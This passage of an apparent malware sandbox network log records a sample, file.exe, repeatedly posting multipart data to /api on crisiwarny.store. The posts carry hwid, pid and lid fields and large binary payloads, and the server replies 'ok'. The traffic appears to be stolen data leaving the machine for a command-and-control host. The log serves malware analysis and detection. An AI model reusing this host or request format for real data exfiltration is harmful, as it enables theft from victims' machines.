                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 77 77 79 6f 33 6a 49 4d 5a 4b 66 71 44 54 54 6c 71 46 36 30 56 39 58 6c 58 76 79 4a 32 38 32 57 2f 2f 47 4b 62 68 55 4f 49 57 43 36 56 66 61 54 4c 30 73 43 32 5a 6f 53 50 76 54 70 64 72 52 54 78 4b 4d 54 71 70 4c 63 71 2b 6a 37 39 70 64 6d 46 41 35 66 45 4e 74 62 70 73 5a 67 61 54 48 71 71 41 30 2b 70 6f 70 61 70 30 6a 49 35 42 32 6b 79 70 43 7a 38 4a 72 39 6a 58 73 57 42 68 67 53 6e 45 58 68 33 6d 34 4d 4d 71 66 31 51 7a 6a 75 75 31 32 34 51 6f 76 6c 55 2b 54 4b 67 37 32 78 6d 75 72 48 4d 30 68 48 58 30 7a 62 42 36 62 5a 4c 6b 45 39 35 4b 4d 41 4b 2f 61 74 55 36 46 47 67 4e 31 6a 7a 34 65 52 39 71 62 64 77 72 6c 4b 45 52 6b 53 55 5a 77 64 78 70 6b 32 54 77 4c 5a 6d 68 49 2b 39 4f 6c 32 74 46 50 45 6f 78 4f 71 6b 74 79 72 36 50 76 32 6c 32 59 55 44 6c 31
                                                                                                    Data Ascii: wwyo3jIMZKfqDTTlqF60V9XlXvyJ282W//GKbhUOIWC6VfaTL0sC2ZoSPvTpdrRTxKMTqpLcq+j79pdmFA5fENtbpsZgaTHqqA0+popap0jI5B2kypCz8Jr9jXsWBhgSnEXh3m4MMqf1Qzjuu124QovlU+TKg72xmurHM0hHX0zbB6bZLkE95KMAK/atU6FGgN1jz4eR9qbdwrlKERkSUZwdxpk2TwLZmhI+9Ol2tFPEoxOqktyr6Pv2l2YUDl1


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.849707104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:28 UTC282OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 12851
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:28 UTC12851OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 34 37 31 44 36 30 41 37 35 43 42 41 34 41 44 33 36 41 33 30 30 35 34 38 38 31 33 33 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"61471D60A75CBA4AD36A30054881336C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                    2024-10-28 06:18:29 UTC1016INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=46bfljij02mc611io8sdq3tj6j; expires=Fri, 21 Feb 2025 00:05:08 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2EO6GY45dm4oSLNq0bpJlaPO2nCUS9hjghH%2Fqto8zXOMmH5y8JN6t4L85FpdBPB3Rz3sw6dfHyi5%2B%2FElzOks1N%2BZxml0%2F%2Fws2fV81fSqFYq8Mv4uchvi2VqaZzkgdIqnVHB"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf0b0d6e3aae-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13791&delivery_rate=2341147&cwnd=251&unsent_bytes=0&cid=6e49b7263db7978b&ts=913&x=0"
                                                                                                    2024-10-28 06:18:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a
                                                                                                    Data Ascii: 11ok 155.94.241.188
                                                                                                    2024-10-28 06:18:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.849708104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:30 UTC282OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 15080
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:30 UTC15080OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 34 37 31 44 36 30 41 37 35 43 42 41 34 41 44 33 36 41 33 30 30 35 34 38 38 31 33 33 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"61471D60A75CBA4AD36A30054881336C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                    2024-10-28 06:18:31 UTC1012INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=1aosglkj1ih0fppgv0ktfsus0q; expires=Fri, 21 Feb 2025 00:05:10 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbNmXRfTMYFlq6xEduSAfTgZjtsyhfRIgjZYkXbbw6pq82%2FRQ26FIQsRpwqDApQX9RlL2c37UD6NAD0YGRvez8xFMYNspV6h08c%2FDL5%2Fv3IyqFbAlzSzwFnw2yn6T%2BHXeDxk"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf150d3946a1-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1078&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16020&delivery_rate=2635122&cwnd=250&unsent_bytes=0&cid=1f85995e7cd5185f&ts=711&x=0"
                                                                                                    2024-10-28 06:18:31 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a
                                                                                                    Data Ascii: 11ok 155.94.241.188
                                                                                                    2024-10-28 06:18:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.849709104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:32 UTC282OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 20247
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:32 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 34 37 31 44 36 30 41 37 35 43 42 41 34 41 44 33 36 41 33 30 30 35 34 38 38 31 33 33 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"61471D60A75CBA4AD36A30054881336C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                    2024-10-28 06:18:32 UTC4916OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0
                                                                                                    Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8
                                                                                                    2024-10-28 06:18:32 UTC1013INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=6tm8apdaapmi5cecn1ekvtpr7a; expires=Fri, 21 Feb 2025 00:05:11 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UouDw%2FC4rPLMsPI85%2FQnfqitk9VCN8Axc2QX35i965C7otF%2FhFtmupMGheUevRhW2ir94vgZ0cbDPrWuzBf6Qax50rsAKCDhGIa%2BOwMfZHzHkqv55IvMEAhrqN3bWqrsToC5"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf1f8967e70e-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2120&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21209&delivery_rate=1345099&cwnd=251&unsent_bytes=0&cid=ca1b0bf37e621c96&ts=724&x=0"
                                                                                                    2024-10-28 06:18:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a
                                                                                                    Data Ascii: 11ok 155.94.241.188
                                                                                                    2024-10-28 06:18:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.849710104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:33 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 1237
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:33 UTC1237OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 34 37 31 44 36 30 41 37 35 43 42 41 34 41 44 33 36 41 33 30 30 35 34 38 38 31 33 33 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"61471D60A75CBA4AD36A30054881336C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                    2024-10-28 06:18:34 UTC1012INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=3jqfub49c5m2hjf84o8a35ei4f; expires=Fri, 21 Feb 2025 00:05:13 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBh8sBq6MXxlPfhv%2B9YBUbHEgzm%2B0bLZBetWdjcfo2dwqJR3QqZ1Gh0c3OLvyyj1YuwRI62aBt3BUv64c%2FqOg95myfDXufxW9sx1lAu%2BAIpC7%2F3FFuNF9Eomu3U8u6LqKHel"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf2a2a5d2c92-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2298&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2154&delivery_rate=1283687&cwnd=251&unsent_bytes=0&cid=dffb96fb59df1b47&ts=796&x=0"
                                                                                                    2024-10-28 06:18:34 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a
                                                                                                    Data Ascii: 11ok 155.94.241.188
                                                                                                    2024-10-28 06:18:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.849711104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:35 UTC283OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 569693
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 34 37 31 44 36 30 41 37 35 43 42 41 34 41 44 33 36 41 33 30 30 35 34 38 38 31 33 33 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"61471D60A75CBA4AD36A30054881336C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 97 fc c2 a5 d0 13 f7 62 2b 25 27 ac 05 dc aa f9 b3 d0 d1 61 3b 48 2d 54 94 41 d4 37 87 88 f0 c4 b5 74 53 1f ae c8 ae 03 a7 ce 1f 75 aa e7 df 47 cf 51 7e c1 df a8 99 ec 2a 68 ad cc f4 c0 15 8a 81 64 de 52 9f 1a 04 b7 a9 69 3c 2f 79 1c a7 7e 5d 6a fd ec 5e 43 8a 6f 1f 16 1e e1 79 65 d6 97 c6 0d f9 6b 49 02 f7 e0 db 7f 6d 70 8a 07 06 ba b8 dd 57 81 62 af eb b7 9b 65 77 7e fe 79 d4 ff 5b ef 2f 14 88 fd 8a 85 f9 90 7e d1 8d dd 34 dc 35 6b b9 da 4d 06 e5 0b 1f ff ef 32 95 ff f7 b0 1b cc ce 69 20 61 01 70 26 c5 cf fc 86 b9 68 26 8a ae e0 94 12 12 5a 6c ca e9 7e 51 cc 0f f1 08 43 0c 9d 08 38 89 ea a7 99 96 8c 82 fd 29 b9 12 e0 33 a2 c2 2e 0a 00 e1 4d 76 93 b4 10 2d 51 ea 57 cd 05 16 9d 0f f3 72 35 27 06 ca ec 53 1f 17 cc ba b8 02 f9 a6 d6 c3 ed 23 44 ed cd 58 c6
                                                                                                    Data Ascii: b+%'a;H-TA7tSuGQ~*hdRi</y~]j^CoyekImpWbew~y[/~45kM2i ap&h&Zl~QC8)3.Mv-QWr5'S#DX
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 86 97 db da 24 1e d6 5d ae 81 50 c1 a3 0f 3a 62 d2 e3 5b ea ef 8a 0b f7 3e 1b 2c 2f ce 51 5b ca cd b5 18 ba 2a 70 fc 30 93 b2 1f bc 3e c2 27 97 bd 65 68 02 f3 6f a3 7a 4e d6 f9 c3 aa 58 25 b1 53 f2 a1 7f fc 88 0c 35 4c 44 b3 8d 90 74 c7 3e c4 07 62 5e be b2 87 2e b8 7e 69 ab b3 c2 75 e0 1b f7 ab cf 51 fd d5 dc 40 4e 35 6e 00 4d d4 67 05 6f b4 d5 b2 a7 1e fc a5 2f 98 d8 77 04 60 96 ca fc 9b b5 7d 3b 3b d3 06 d6 26 52 e6 08 47 0f 72 2d 9c 0a 70 96 b2 ff c1 ec 58 0c 18 e4 05 6f f6 10 01 79 e5 de cf 6a c9 fe ff ba 6f 67 79 6c 97 bc 7b 5e a6 26 70 d0 eb f6 ac 46 f3 a7 8d 4d 97 7e dc 5e b9 9f 85 fa cb c5 7d e5 c3 03 2f 81 47 4d b3 3f fb b5 4e 4e c9 07 f5 83 77 9a ac 3e 79 b6 5b dd fa 80 81 9d b5 dc 2c 81 c7 92 26 80 15 5d 68 8e 99 4e 8e 0a 60 f3 c6 ef dd 33 ac
                                                                                                    Data Ascii: $]P:b[>,/Q[*p0>'ehozNX%S5LDt>b^.~iuQ@N5nMgo/w`};;&RGr-pXoyjogyl{^&pFM~^}/GM?NNw>y[,&]hN`3
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 33 2f c5 92 f7 83 b3 3d 69 c6 b5 af 93 af 46 bb be d5 86 45 21 f8 9b e8 ac 89 9c 19 30 e2 01 53 7b 0b db 5c 33 88 a8 e9 ef 29 21 fe 40 4d 93 11 0f d7 90 62 eb 2b d1 6c bd 09 7d a3 c8 48 fd 9e be 70 59 ae 42 c5 fa cc 66 2b 1e 82 32 d5 a6 34 eb b6 11 8f a0 34 9a 4c e6 d5 0b 2a 99 4d 64 fc cc ea 8c 76 f2 50 54 02 03 ce 34 20 6b bc fa dc 9a f7 9d 34 39 20 8a 3d a0 62 7f b4 d6 00 a1 b6 b2 b6 fb c4 cd 75 33 88 38 51 f0 15 a8 69 af 53 eb 0b d4 01 f2 68 4c e9 63 3f fe 92 4b ba 66 79 bc a4 9f f3 95 68 e9 64 48 5b bd 94 d3 ec e4 92 d3 ed 25 83 db fb f4 6b 86 2f b0 18 4e c2 97 db 6f d7 e9 fc 48 5f b2 81 44 38 93 fe bc 70 52 0a 6f 10 2c 29 ad 6b 4b f3 ca 3c 24 93 f6 02 b2 e3 24 b3 da ee 2d 9d b4 a5 c7 0d af fc 2b 40 34 79 5f 97 d9 ea fc 31 6c 62 db 22 69 59 fb bb 8c
                                                                                                    Data Ascii: 3/=iFE!0S{\3)!@Mb+l}HpYBf+244L*MdvPT4 k49 =bu38QiShLc?KfyhdH[%k/NoH_D8pRo,)kK<$$-+@4y_1lb"iY
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 2e 52 7d 41 3b 7b f1 d4 48 86 2e cf 2d 2f 35 d9 48 ee d5 9c 4e d5 a3 c2 ed 08 02 0f 9f 86 e3 49 d7 f4 30 42 62 40 fb 9f ac 15 56 21 ef b1 b6 2f 4e 0e 11 d8 34 49 04 e5 35 d2 23 03 e7 a1 0f 88 1f 0a ac 07 c2 c2 7d c0 cb aa 8b cb 8f 05 b5 c2 b4 39 ee b2 ae 93 cb ca 8a b1 6f e5 f9 09 1c fe 7b 03 06 9e 23 f3 af 1c 1a fd ff de c8 ff e7 65 37 27 f9 f8 0a d8 87 00 96 1b 98 7c 5d a0 81 90 41 90 07 b3 dd 2c 33 10 04 d8 53 22 91 ac 58 07 e6 4d 33 60 1d ea 8c 01 88 55 c1 f5 c8 6e 0c 28 e2 28 cd 21 44 a8 25 74 38 a5 b9 b4 f5 1e b7 7a a7 ce a9 da 62 31 92 6a 1a 64 02 ac 21 47 51 c0 fb 4b a0 cb ef cb 2d b0 03 b0 4e 10 26 39 77 b7 77 4e 38 82 72 ec 38 9c 74 fa 70 2d 1b f4 f2 00 b8 d5 96 35 16 b1 43 6e fa 4b a1 4d 23 b4 9e de 42 5c d3 2f 85 7d 3d 7d 6a 00 9f 18 4c d9 6e
                                                                                                    Data Ascii: .R}A;{H.-/5HNI0Bb@V!/N4I5#}9o{#e7'|]A,3S"XM3`Un((!D%t8zb1jd!GQK-N&9wwN8r8tp-5CnKM#B\/}=}jLn
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 6a 70 f7 c0 c8 5d c5 bb 83 87 a1 13 cb b6 5f 0e 0a 33 58 67 50 7a cf 73 56 37 8d 01 a1 55 48 0e ea 2c 6a 9d a1 5f bc 60 49 1c 6b ba e7 fc 34 88 30 d7 73 90 30 d7 71 9c e2 40 bc 3c 52 bd da 1b 5a d1 5a 81 a6 88 19 3e 21 a9 39 9f 7f 45 7e 17 91 3f fc f1 3d 41 eb 10 c6 46 c0 42 9c 7c 8f 98 61 c0 bd a1 8f a7 28 c9 53 65 b7 56 96 b8 ff 78 d7 51 45 31 29 e2 20 5e 07 1c 58 9b ff 7a 42 4b 06 26 bb 4d 27 0b 73 be 38 ec 98 28 72 f5 12 06 8a fa 77 db af b1 c6 5c 87 3f 47 ae f2 40 43 63 cd 2f 46 1c fb 74 af 7a 63 33 e5 40 d0 8f b0 ea 89 96 d4 6b 0e 5f 44 99 87 14 1d f8 da 0f 99 9e 28 19 4b f2 d9 6d 70 91 4f 1c b5 7c 02 dd 4d 74 e7 b6 bb 0b ac 41 b9 cd 20 0c 3b b4 c5 da 18 74 eb b1 1a bc 46 04 aa 4f 86 f4 58 71 72 7b 3f cd 3c 9c 5e 6a 33 4d 61 73 4f 2c 09 67 c2 58 f1
                                                                                                    Data Ascii: jp]_3XgPzsV7UH,j_`Ik40s0q@<RZZ>!9E~?=AFB|a(SeVxQE1) ^XzBK&M's8(rw\?G@Cc/Ftzc3@k_D(KmpO|MtA ;tFOXqr{?<^j3MasO,gX
